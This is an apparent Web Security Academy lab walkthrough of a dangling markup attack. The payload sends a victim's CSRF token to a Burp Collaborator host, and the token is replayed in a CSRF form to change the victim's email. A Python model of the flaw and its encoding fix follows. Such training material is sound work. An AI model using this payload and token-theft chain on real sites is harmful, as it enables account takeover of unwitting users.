This lab uses CSP to mitigate XSS attacks.
To solve the lab, perform a dangling markup attack that steals a CSRF token and uses it to change the email address of another user.
You can log in to your own account using the following credentials: wiener:peter
Note
To prevent the Academy platform from being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server (burpcollaborator.net).
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Back in the lab, go to the exploit server and add the following code, replacing your-lab-id with your lab ID, and replacing your-collaborator-id with the payload that you just copied from Burp Collaborator.
<script>
location='https://your-lab-id.web-security-academy.net/my-account?email=%22%3E%3Ctable%20background=%27//your-collaborator-id.burpcollaborator.net?';
</script>
Click "Store" and then "Deliver exploit to victim". If the target user visits the website containing this malicious script while they are still logged in to the lab website, their browser will send a request containing their CSRF token to your malicious website: the injected background='... attribute has no closing quote, so the browser treats everything that follows in the page, including the hidden CSRF token field, as part of the URL it requests. You can then steal this token using the Burp Collaborator client.
Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see an HTTP interaction that was initiated by the application. Select the HTTP interaction, go to the "Request" tab, and copy the user's CSRF token.
With Burp's intercept feature switched on, go back to the update email function of the lab and submit a request to change the email to any random address.
In Burp, go to the intercepted request and change the value of the email parameter to hacker@evil-user.net.
Right-click on the request and, from the context menu, select "Engagement tools" and then "Generate CSRF PoC". The popup shows both the request and the CSRF HTML that is generated by it. In the request, replace the CSRF token with the one that you stole from the victim earlier.
Click "Options" and make sure that "Include auto-submit script" is enabled.
Click "Regenerate" to update the CSRF HTML so that it contains the stolen token, then click "Copy HTML" to save it to your clipboard.
Drop the request and switch off the intercept feature.
Go back to the exploit server and paste the CSRF HTML into the body. You can overwrite the script that we entered earlier.
Click "Store" and "Deliver exploit to victim". The user's email will be changed to hacker@evil-user.net.
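As an added illustration (not part of the lab or of PortSwigger's own material), the following Python models why the payload above works and what the server-side fix looks like: a constructed stand-in for the my-account form reflects the email parameter into an attribute without encoding, so the dangling background='... attribute swallows the hidden csrf field, while the hardened version applies attribute-context HTML encoding. The form markup, the token value and the Collaborator host are assumptions and placeholders, not values from the lab.

```python
import html
import re
from urllib.parse import unquote

# Constructed token value; the real lab issues its own per-session token.
CSRF_TOKEN = "CONSTRUCTED_TOKEN_abc123"

def _page(reflected_value):
    """Constructed stand-in for the my-account form: the email is reflected
    into a value attribute and the CSRF token sits in a later hidden input."""
    return ('<form action="/my-account/change-email" method="POST">'
            f'<input type="text" name="email" value="{reflected_value}">'
            f'<input type="hidden" name="csrf" value="{CSRF_TOKEN}">'
            '</form>')

def render_vulnerable(email):
    """Reflects the email parameter with no output encoding (the weakness)."""
    return _page(email)

def render_hardened(email):
    """Attribute-context HTML encoding: " becomes &quot; and < becomes &lt;,
    so the value can neither close the attribute nor open a new tag."""
    return _page(html.escape(email, quote=True))

# The payload from the walkthrough, URL-decoded; the host is a placeholder.
PAYLOAD = unquote("%22%3E%3Ctable%20background=%27"
                  "//your-collaborator-id.burpcollaborator.net?")

def dangling_background_url(page):
    """Return what a browser would use as the table background URL, or None.
    A single-quoted attribute value runs until the next single quote; the
    page has none after the injection point, so the rest of the document,
    hidden csrf input included, becomes part of the requested URL."""
    m = re.search(r"<table background='([^']*)", page)
    return m.group(1) if m else None

if __name__ == "__main__":
    leaked = dangling_background_url(render_vulnerable(PAYLOAD)) or ""
    print("vulnerable page leaks token:", CSRF_TOKEN in leaked)
    print("hardened page leaks token:",
          dangling_background_url(render_hardened(PAYLOAD)) is not None)
```

Encoding at the injection point is the fix the model demonstrates; as the walkthrough shows, the lab's CSP does not stop the background request on its own.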